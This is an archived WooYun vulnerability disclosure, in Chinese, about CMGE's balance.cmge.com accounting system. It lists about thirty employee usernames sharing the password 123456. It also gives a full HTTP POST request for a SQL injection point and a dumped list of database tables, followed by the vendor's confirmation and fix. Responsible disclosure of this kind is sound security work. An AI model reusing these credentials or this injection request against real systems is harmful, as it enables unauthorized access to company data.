乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-26: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-06: 厂商已经修复漏洞并主动公开,细节向公众公开
CMGE中国手游于2012年9月25日登陆美国纳斯达克(NASDAQ:CMGE),CMGE中国手游是国内首家登陆纳斯达克的手机游戏公司
http://balance.cmge.com
首先是弱口令
chenqi 123456caisheng 123456huangrong 123456hehua 123456heyan 123456liuzong 123456liujie 123456liushuai 123456liuguang 123456liugong 123456liaozong 123456liye 123456lipeng 123456xiaolian 123456wangliang 123456tangtang 123456shensheng 123456sunbin 123456qiugong 123456qianhang 123456majian 123456zhaoxing 123456zhangqiong 123456zhangqian 123456yuanda 123456yelu 123456yanyun 123456yangyong 123456xugong 123456xiaozong 123456hezong 123123
随便登录一个,项目总表查询处存在注入
POST /project/doProjectList.action HTTP/1.1Host: balance.cmge.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0Accept: */*Accept-Language: zh,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://balance.cmge.com/index.actionContent-Length: 109Cookie: Hm_lvt_000253421fb8b207dc2b9d3d879bcf44=1450791153,1450791315,1450792816,1450845176; s_fid=47810FD7CFDD27C6-26FEF33986935D12; s_nr=1450791332694; s_vnum=1453383332695%26vn%3D2; Hm_lvt_269a9dbb19b027f2039ac8601dd97088=1450795555,1450795590,1450845186,1450970145; pgv_pvi=8132900984; Hm_lvt_76b2c7f11d8255635828ff5ab3b82031=1450794876; JSESSIONID=0A3D1BB42E7569B666F58909099CD61CX-Forwarded-For: 127.0.0.1Connection: keep-aliveproject.status=-1&project.verifionStatus=-1&project.invalid=false&project.id=&project.customerName=&ajax=true
Database: kkfun_smart +----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| SMART_REPORT_STAT | 9661943 || PROJECT_ACTIVATION | 1291880 || IP_PROVINCE_DUAN | 1128100 || SMART_LOG_TEMP_CP_CHECK | 638685 || HFIVE_REPORT | 361509 || HFIVE_REPORT_bak | 56755 || HFIVE_FEE_LOG | 48503 || CUSTOMER_LOG | 39838 || PROJECT_PRODUCT_PANNER_COOPERATE | 34107 || SMART_DAILY_201502 | 29229 || SMART_DAILY_201501 | 29047 || SMART_DAILY_201503 | 28403 || SMART_DAILY_201412 | 27972 || SMART_DAILY_201511 | 23361 || SMART_DAILY_201510 | 20734 || SMART_DAILY_201512 | 19453 || SMART_DAILY_201509 | 19068 || SMART_DAILY_201508 | 18737 || SMART_DAILY_201507 | 18490 || SMART_DAILY_201506 | 16543 || SMART_DAILY_201505 | 16413 || SMART_DAILY_201504 | 14168 || ANDROID_REPORT_201501 | 10873 || ANDROID_REPORT_201502 | 10754 || ANDROID_REPORT_201412 | 10201 || ANDROID_REPORT_201503 | 10151 || ANDROID_REPORT_201507 | 5147 || ANDROID_REPORT_201511 | 5017 || ANDROID_REPORT_201504 | 4576 || ANDROID_REPORT_201505 | 4547 || ANDROID_REPORT_201508 | 4392 || ANDROID_REPORT_201506 | 4325 || ANDROID_REPORT_201510 | 4052 || ANDROID_REPORT_201512 | 3813 || ANDROID_REPORT_201509 | 3777 || SMART_LOG_TEMP_CP | 2662 || PRODUCT_PORTAL_LCD | 2661 || SMART_DAILY_TEMP | 2450 || ANDROID_LOG_ERROR | 2355 || PROJECT | 1593 || BALANCE_PROJECT_SMART | 1531 || SUIYUE_BALANCE_MONTH | 1360 || SMART_MONTH_201502 | 1095 || SMART_MONTH_201503 | 1043 || SMART_MONTH_201501 | 1037 || SMART_MONTH_201412 | 1002 || PORTAL_USER | 924 || SMART_MONTH_201512 | 818 || SMART_MONTH_201511 | 806 || SMART_MONTH_201510 | 752 || SMART_MONTH_201507 | 669 || SMART_MONTH_201509 | 659 || SMART_MONTH_201508 | 626 || SMART_MONTH_201506 | 546 || SMART_MONTH_201504 | 500 || PRODUCT_PANNER_PRICE | 468 || SMART_MONTH_201505 | 464 || BALANCE_PANNER_RATE | 400 || SYS_MENU_USER_SMART | 379 || SUIYUE_BALANCE_PROJECT | 369 || ANDROID_CHANGE_PERCENT | 343 || CUSTOMER | 323 || CONTENT_PROVIDER | 270 || SMART_ACT_PERCENT | 223 || SUIYUE_BALANCE_PROJECT_TEMP | 201 || SYS_MENU_ROLE_SMART | 199 || SUIYUE_BALANCE_ACCOUNT | 175 || PRODUCT_COOPERATE | 125 || TOTAL_BALANCE_ACCOUNT | 124 || SUIYUEMESSAGE | 110 || BALANCE_PROJECT_ADVERT | 96 || PRODUCT | 79 || PANNER_ACCOUNT | 63 || ACTIVATION_LOG_201507 | 61 || ACTIVATION_LOG_TEMP | 61 || SYS_MENU_SMART | 49 || BD_GROUP_RELATION | 39 || BANK | 32 || PRODUCT_PROJECT_VERSION | 22 || LCD_PIXEL | 15 || SUIYUE_BALANCE_SWITCH | 12 || TOTAL_BALANCE_SWITCH | 11 || MONITORS | 10 || BUSINESS_DEVELOPER | 8 || PORTAL | 5 || INVOICE_TYPE | 4 || PROJECT_VERSION | 3 || AGENT | 1 || BALANCE_SWITCH | 1 || CMGE_BALANCE_SWITCH | 1 |+----------------------------------+---------+
加个验证码,过滤参数
危害等级:中
漏洞Rank:10
确认时间:2015-12-28 10:40
已经联系开发处理,感谢hecate兄弟。
2016-01-06:已修复,谢谢!